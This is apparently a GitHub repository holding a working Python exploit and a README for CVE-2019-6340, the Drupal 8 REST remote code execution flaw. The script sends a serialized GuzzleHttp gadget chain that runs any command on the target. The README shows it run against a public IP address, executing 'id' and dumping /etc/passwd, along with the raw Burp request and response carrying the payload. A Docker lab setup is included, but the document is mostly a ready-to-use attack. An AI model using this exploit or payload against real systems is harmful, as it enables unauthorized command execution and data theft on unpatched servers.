├── Drupal8.jpg
├── CVE-2019-6340.jpg
├── CVE-2019-6340-burp.jpg
├── CVE-2019-6340.py
└── README.md


/Drupal8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/Drupal8.jpg


--------------------------------------------------------------------------------
/CVE-2019-6340.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/CVE-2019-6340.jpg


--------------------------------------------------------------------------------
/CVE-2019-6340-burp.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/CVE-2019-6340/HEAD/CVE-2019-6340-burp.jpg


--------------------------------------------------------------------------------
/CVE-2019-6340.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import sys
 3 | import re
 4 | 
 5 | # url = "http://47.75.157.227"
 6 | url = sys.argv[1]
 7 | url_dir = "/node/"
 8 | vuln_url = url + url_dir
 9 | print r'''
10 |    ______     ________    ___   ____ _______        __________ __ __  ____ 
11 |   / ____/ |  / / ____/   |__ \ / __ <  / __ \      / ___/__  // // / / __ \
12 |  / /    | | / / __/________/ // / / / / /_/ /_____/ __ \ /_ </ // /_/ / / /
13 | / /___  | |/ / /__/_____/ __// /_/ / /\__, /_____/ /_/ /__/ /__  __/ /_/ / 
14 | \____/  |___/_____/    /____/\____/_//____/      \____/____/  /_/  \____/  
15 |                                                                            
16 | 
17 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340
18 | 
19 |                          jas502n
20 | '''
21 | print "\n\nExample: python CVE-2019-6340.py url cmd\n"
22 | print ">>>Vuln Url=%s" % vuln_url
23 | 
24 | querystring = {"_format":"hal_json"}
25 | cmd = sys.argv[2]
26 | cmd_lenght = len(cmd)
27 | payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"http://localhost/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_lenght,cmd)
28 | 
29 | proxies = {"http": "http://127.0.0.1:8080","https": "http://127.0.0.1:8080"}
30 | headers = {
31 |     'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
32 |     'Connection': "close",
33 |     'Content-Type': "application/hal+json",
34 |     'Accept': "*/*",
35 |     'Cache-Control': "no-cache"
36 |     }
37 | 
38 | response = requests.request("POST", vuln_url, data=payload, headers=headers, proxies=proxies, params=querystring)
39 | # print(response.text)
40 | if response.status_code==403 and "u0027access" in response.text :
41 |     print "\n>>>>Exit CVE-2019-6340 RCE Vuln!\n"
42 |     m = re.findall('.*permissions."}(.*)',response.text,re.S)
43 |     print m[0]
44 |       
45 | else:
46 |     print "No Vuln Exit!"
47 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2019-6340 Drupal8's REST RCE, SA-CORE-2019-003
  2 | 
  3 | ### 0x01 docker search CVE-2019-6340
  4 | ```
  5 | NAME                     DESCRIPTION                              STARS     OFFICIAL   AUTOMATED
  6 | knqyf263/cve-2019-6340   Environment for CVE-2019-6340 (Drupal)   0                    
  7 | cved/cve-2019-6340       cve-2019-6340                            0     
  8 | ```
  9 | ### 0x02 docker pull knqyf263/cve-2019-6340
 10 | 
 11 | ```
 12 | Using default tag: latest
 13 | latest: Pulling from knqyf263/cve-2019-6340
 14 | 6ae821421a7d: Pull complete 
 15 | 08f3d19635b0: Pull complete 
 16 | dc8a54b8000b: Pull complete 
 17 | b2c1d103db99: Pull complete 
 18 | edfa752aa38a: Pull complete 
 19 | 583d37cbf2f0: Pull complete 
 20 | c7846a240c1d: Pull complete 
 21 | d8f9f0fd02fe: Pull complete 
 22 | 01d43e56770d: Pull complete 
 23 | dbe439e2caf9: Pull complete 
 24 | 3de30e1f5211: Pull complete 
 25 | 209dd35ef060: Pull complete 
 26 | 3d97847926b1: Pull complete 
 27 | d0da67360f39: Pull complete 
 28 | 30efc6ba9a1f: Pull complete 
 29 | a7bf83e4c4c3: Pull complete 
 30 | f4e7678b40a5: Pull complete 
 31 | 9c786cb4409c: Pull complete 
 32 | e2a8985b3b6b: Pull complete 
 33 | e6b727cd2f54: Pull complete 
 34 | afc99ae05ad1: Pull complete 
 35 | 5db8cf1431d4: Pull complete 
 36 | 7b90e0b5c074: Pull complete 
 37 | 6f123bc91ad7: Pull complete 
 38 | 00456a0879a4: Pull complete 
 39 | 5ee332aeb757: Pull complete 
 40 | 5a6951f3933f: Pull complete 
 41 | 6733bf98ddeb: Pull complete 
 42 | Digest: sha256:af74572eca0aa665507cb1dd536deb18ec1c17ac3ca5757b9cdf8f7adb174876
 43 | Status: Downloaded newer image for knqyf263/cve-2019-6340:latest
 44 | ```
 45 | ### 0x03 docker run -d -p80:80 --name jas502n knqyf263/cve-2019-6340
 46 | 
 47 | `1ed1e2278904d06f5b8c5d5fda677b393e16414bbf0bd93f5d8f359d76360e49`</br>
 48 | ![](./Drupal8.jpg)
 49 | 
 50 | ### 0x04 python CVE-2019-6340.py url cmd
 51 | `s:2:\"id\";`
 52 | ![](./CVE-2019-6340.jpg)
 53 | 
 54 | ```
 55 | python CVE-2019-6340.py http://47.75.157.227  "id"
 56 | 
 57 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340
 58 | 
 59 | Example: python CVE-2019-6340.py url cmd
 60 | 
 61 | >>>Vuln Url=http://47.75.157.227/node/
 62 | 
 63 | >>>>Exit CVE-2019-6340 RCE Vuln!
 64 | 
 65 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
 66 | 
 67 | ```
 68 | 
 69 | ```
 70 | python CVE-2019-6340.py http://47.75.157.227  "cat /etc/passwd"
 71 | 
 72 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340
 73 | 
 74 | Example: python CVE-2019-6340.py url cmd
 75 | 
 76 | >>>Vuln Url=http://47.75.157.227/node/
 77 | 
 78 | >>>>Exit CVE-2019-6340 RCE Vuln!
 79 | 
 80 | root:x:0:0:root:/root:/bin/bash
 81 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 82 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
 83 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
 84 | sync:x:4:65534:sync:/bin:/bin/sync
 85 | games:x:5:60:games:/usr/games:/usr/sbin/nologin
 86 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 87 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 88 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 89 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 90 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 91 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 92 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 93 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 94 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 95 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 96 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 97 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 98 | _apt:x:100:65534::/nonexistent:/bin/false
 99 | 
100 | ```
101 | 
102 | ##### burpsuite request
103 | ![](./CVE-2019-6340-burp.jpg)
104 | ```
105 | POST /node/?_format=hal_json HTTP/1.1
106 | Host: 47.75.157.227
107 | User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
108 | Connection:  keep-alive
109 | Content-Type: application/hal+json
110 | Accept:  */*
111 | Cache-Control: no-cache
112 | Content-Length: 626
113 | 
114 | {
115 |   "link": [
116 |     {
117 |       "value": "link",
118 |       "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
119 |     }
120 |   ],
121 |   "_links": {
122 |     "type": {
123 |       "href": "http://localhost/rest/type/shortcut/default"
124 |     }
125 |   }
126 | }
127 | 
128 | ```
129 | ##### burpsuite response
130 | ```
131 | HTTP/1.1 403 Forbidden
132 | Date: Mon, 27 May 2019 19:12:21 GMT
133 | Server: Apache/2.4.25 (Debian)
134 | X-Powered-By: PHP/7.2.15
135 | Cache-Control: must-revalidate, no-cache, private
136 | X-UA-Compatible: IE=edge
137 | Content-language: en
138 | X-Content-Type-Options: nosniff
139 | X-Frame-Options: SAMEORIGIN
140 | Expires: Sun, 19 Nov 1978 05:00:00 GMT
141 | Vary: 
142 | X-Generator: Drupal 8 (https://www.drupal.org)
143 | Keep-Alive: timeout=5, max=100
144 | Connection: Keep-Alive
145 | Content-Type: application/hal+json
146 | Content-Length: 239
147 | 
148 | {"message":"The shortcut set must be the currently displayed set for the user and the user must have \u0027access shortcuts\u0027 AND \u0027customize shortcut links\u0027 permissions."}uid=33(www-data) gid=33(www-data) groups=33(www-data)
149 | ```
150 | ### 0x05 参考链接
151 | `https://github.com/knqyf263/CVE-2019-6340` </br>
152 | `https://www.ambionics.io/blog/drupal8-rce` </br>
153 | `https://gist.githubusercontent.com/theMiddleBlue/22c6908d955519bd23b3d0b349badcc5/raw/af5746d4755c9e4cca6d8ef15334f81027c524df/drupal8rce.json`</br>
154 | `https://www.drupal.org/sa-core-2019-003`
155 | 


--------------------------------------------------------------------------------